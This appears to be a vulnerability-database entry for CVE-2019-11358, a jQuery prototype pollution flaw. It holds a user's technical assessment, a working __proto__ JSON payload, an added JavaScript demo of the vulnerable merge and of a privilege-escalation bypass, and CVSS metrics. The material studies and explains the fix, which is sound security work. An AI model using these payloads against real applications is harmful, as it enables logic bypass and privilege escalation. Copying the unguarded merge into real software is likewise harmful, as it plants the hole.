Attacker Value: Low (1 user assessed)
Exploitability: Moderate (1 user assessed)
User Interaction: Required
Privileges Required: None
Attack Vector: Network

CVE-2019-11358

Disclosure Date: April 20, 2019
Exploited in the Wild
MITRE ATT&CK tactics: Impact (validated); Initial Access (validated)

Description

jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.

Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Technical Analysis

I don't know what the official term is, but it is a vulnerability that can change common objects.

When I tried it in the console, the result was as follows.

Prepare the variables test1 and test2, and assign a string to the "test" property of test1's "__proto__".

Then test2 also displays the string that was assigned to test1.

I don't know what the specification says, but the same phenomenon occurs when using "__proto__" on the elements of an array.

If you assign {"admin": 123456} to test["__proto__"], the admin property is created on test, and only the assigned value is stored (123456 in this example).

If you assign {"user": 999999} to test["user"], the user property is created on test, and the assigned JSON itself is stored.

Impact
Properties may be added, or existing ones modified.

As a result, it can lead to DoS and remote code execution.

Also, changing properties can lead to logic bypass and privilege escalation.


First, I downloaded 3.3.1 and 3.4.1 to check the phenomenon.

https://jquery.com/download/

Using the verification code from the following article, I was able to confirm the vulnerability's behavior.

https://snyk.io/blog/after-three-years-of-silence-a-new-jquery-prototype-pollution-vulnerability-emerges-once-again/

let a = $.extend(true, {}, JSON.parse('{"__proto__": {"devMode": true}}'))
console.log({}.devMode);
The result of console.log:

3.3.1: true
3.4.1: undefined
Confirmation of the fix
Since I was able to confirm the behavior, I decided to confirm where the fix was made.

As I noticed, a check was added to see whether the name is "__proto__".

When I tried removing this check, prototype pollution occurred.

I'm not familiar with JavaScript, so I can't understand what it is doing just by reading the source code.

Let's actually look at the data handled in the process.

Since the contents of "name" were being checked, let's see what "name" is.

A lot came out.

After a little research, it looks like they are jQuery functions.

"__proto__" is also included.

Since name contains "__proto__", I looked for the places where name is used as an array index and assigned to.

Since there were two places, I added console.log to both.

The results came out jumbled, so I filtered them.

It was the first place that used "__proto__".

I made a pinpoint fix to show devMode, and the contents were displayed nicely.
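The mechanism the assessment above walks through, as an added example that is not part of the original assessment and is not jQuery's own code: a minimal deep merge modelled on the recursive branch of jQuery.extend(true, ...), with a guardProto switch standing in for the name === "__proto__" check that 3.4.0 added. The two JSON payloads and the isAdmin check are constructed for illustration; the second demo shows the logic-bypass case mentioned under Impact.

```javascript
// Added example: a minimal deep merge modelled on jQuery.extend(true, ...).
// This is NOT jQuery's code; it reproduces only the branch relevant to
// CVE-2019-11358. guardProto=false behaves like 3.3.1, guardProto=true like 3.4.0.

function isPlainObject(v) {
  // Same idea as jQuery.isPlainObject: an object literal, or an object whose
  // prototype is null. Note that Object.prototype itself passes this test.
  if (Object.prototype.toString.call(v) !== "[object Object]") return false;
  const proto = Object.getPrototypeOf(v);
  return proto === null || proto === Object.prototype;
}

function deepExtend(target, source, { guardProto = false } = {}) {
  for (const name in source) {
    // The 3.4.0 fix: never merge into a key named __proto__.
    if (guardProto && name === "__proto__") continue;

    // For a plain {} target, target["__proto__"] is Object.prototype itself.
    const src = target[name];
    const copy = source[name];
    if (target === copy) continue;

    if (copy && isPlainObject(copy)) {
      // Vulnerable step: src (here Object.prototype) counts as a plain object,
      // so it is reused as the merge target and receives the attacker's keys.
      const clone = src && isPlainObject(src) ? src : {};
      target[name] = deepExtend(clone, copy, { guardProto });
    } else if (copy !== undefined) {
      target[name] = copy;
    }
  }
  return target;
}

// Constructed attacker-controlled JSON. JSON.parse creates a real own property
// named "__proto__" (an object literal would instead set the prototype).
const DEV_MODE_PAYLOAD = '{"__proto__": {"devMode": true}}';
const ADMIN_PAYLOAD = '{"__proto__": {"isAdmin": true}}';

// Reproduces the Snyk check: does an unrelated {} gain a devMode property?
function pollutionDemo(guardProto) {
  const bystander = {}; // created before the merge and never touched by it
  deepExtend({}, JSON.parse(DEV_MODE_PAYLOAD), { guardProto });
  const leaked = bystander.devMode;
  delete Object.prototype.devMode; // clean up so later code is unaffected
  return leaked; // true when unguarded (3.3.1 behaviour), undefined when guarded
}

// Constructed authorisation check: the logic-bypass case from the Impact section.
function isAdmin(user) {
  return user.isAdmin === true;
}

function privilegeEscalationDemo(guardProto) {
  deepExtend({}, JSON.parse(ADMIN_PAYLOAD), { guardProto });
  const guest = { name: "guest" }; // has no own isAdmin property
  const granted = isAdmin(guest);  // inherits the polluted value when unguarded
  delete Object.prototype.isAdmin;
  return granted;
}

console.log("3.3.1-style merge, {}.devMode:", pollutionDemo(false));        // true
console.log("3.4.0-style merge, {}.devMode:", pollutionDemo(true));         // undefined
console.log("guest is admin (unguarded):", privilegeEscalationDemo(false)); // true
console.log("guest is admin (guarded):", privilegeEscalationDemo(true));    // false
```

The guard works because the pollution needs the recursive call to run with Object.prototype as its target; skipping the "__proto__" key before that lookup means the attacker's object is never merged anywhere. The same check is the one the assessment found and removed to re-trigger the bug in 3.4.1.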

CVSS V3 Severity and Metrics
Base Score:
6.1 Medium
Impact Score:
2.7
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Changed
Confidentiality (C):
Low
Integrity (I):
Low
Availability (A):
None
